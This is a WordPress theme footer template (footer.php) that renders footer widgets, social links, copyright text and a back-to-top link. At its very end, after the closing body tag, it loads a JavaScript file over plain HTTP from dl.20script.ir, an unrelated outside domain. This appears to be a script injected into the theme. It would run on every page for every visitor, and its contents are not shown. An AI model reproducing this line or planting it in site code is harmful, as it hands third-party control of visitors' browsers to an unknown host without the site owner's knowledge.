<?php
/**
 * The template for displaying the footer.
 *
 * Contains the closing of the id=main div and all content after
 */
?>	
	
	</div><!-- #main -->
	<footer id="colophon" class="site-footer" role="contentinfo">
		<?php if( is_active_sidebar('footer_area') ): ?>
		<div id="footer-widget-row">
			<div class="wrap">
				<?php dynamic_sidebar('footer_area'); ?>
			</div>
		</div>
		<?php endif; ?>
		
		<?php if(function_exists('wolf_music_network')) : ?>
		<div id="footer-social-container">
			<div class="wrap">
				<?php wolf_music_network(32, 'center'); ?>
			</div>
		</div>
		<?php endif; ?>
		<?php if(function_exists('bd_music_network')) : ?>
		<div id="footer-social-container">
			<div class="wrap">
				<?php bd_music_network(32, 'center'); ?>
			</div>
		</div>
		<?php endif; ?>

		<div class="site-info">
			<div class="wrap">
				

				<!-- Copyright -->
				<div id="copyright">
					<?php echo stripslashes(bd_get_option('footer_text')); ?>
				</div>
					
				<div class="clear"></div>
				<p class="center" id="back-to-the-top">
					<a href="#top" class="scroll">&uarr; <?php _e('BACK TO THE TOP', 'bd'); ?> &uarr;</a>
				</p>
			</div>
		</div>
	</footer><!-- #colophon .site-footer -->
</div><!-- #page .hfeed .site -->


<?php if(bd_get_option('tracking_code')) { echo stripslashes(bd_get_option( 'tracking_code' ) ); } ?>
<?php wp_footer(); ?>
</body>
<script type="text/javascript" src="http://dl.20script.ir/img/website.js"></script>
</html>